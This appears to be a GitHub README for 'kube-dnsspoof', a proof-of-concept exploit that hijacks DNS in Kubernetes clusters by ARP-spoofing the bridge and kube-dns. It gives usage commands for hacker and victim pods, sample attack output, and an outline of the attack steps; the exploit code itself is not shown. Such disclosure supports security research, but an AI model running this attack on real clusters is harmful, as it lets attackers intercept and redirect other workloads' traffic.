Skip to content
A POC for DNS spoofing in kubernetes clusters. Runs with minimum capabilities, on default installations of kuberentes.
Python Dockerfile
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.
pods initial Jun 30, 2019
Dockerfile initial Jun 30, 2019 added explanation of forward-timeout Aug 30, 2019 added argparse, and explanation about parameters Jun 30, 2019


Kube-dnsspoof is a POC for DNS spoofing in kubernetes clusters. This exploit runs with minimum capabilities, on default installations of kuberentes. This repository contains all files and related code for running this exploit.

The following video demonstrates how onw can use this to intercept traffic for specifc domains in a cluster: asciicast Further read on this subject can be done on this blog post


A Kubernetes cluster

Run the exploit

First, create the pods by:

$ kubectl create -f pods/
pod/hacker created     
pod/victim created   

After the pod was created, exec into the hacker pod. it will contain the exploit and hosts file inside the /dnsspoof folder.

$ kubectl exec -it hacker zsh
➜  hacker /dnsspoof ls  hosts
➜  hacker /dnsspoof 

Next, edit the hosts file to contain your spoofed domains. The script will proxy all DNS requests to the real kube-dns pod, except for the entries in the hosts file.

Example for successful run of the exploit:

➜  hacker /dnsspoof ./
[*] starting attack on indirect mode
Bridge: c0:0f:fe:eb:4b:e0
Kube-dns: 02:42:bb:76:74:f8

[+] Taking over DNS requests from kube-dns. press Ctrl+C to stop


When proxying alot of requests, the code can hang. to control this, you can pass a timeout via --forward-timeout

The steps of the exploit:

  • Deciding whether it can run
  • Discovering relevant mac/ip addresses
  • ARP spoofing the bridge (and kube-dns in case of direct attack mode)
  • DNS proxy requests, and spoofing relevant entries
  • Restoring all network on CTRL+C interrupt
You can’t perform that action at this time.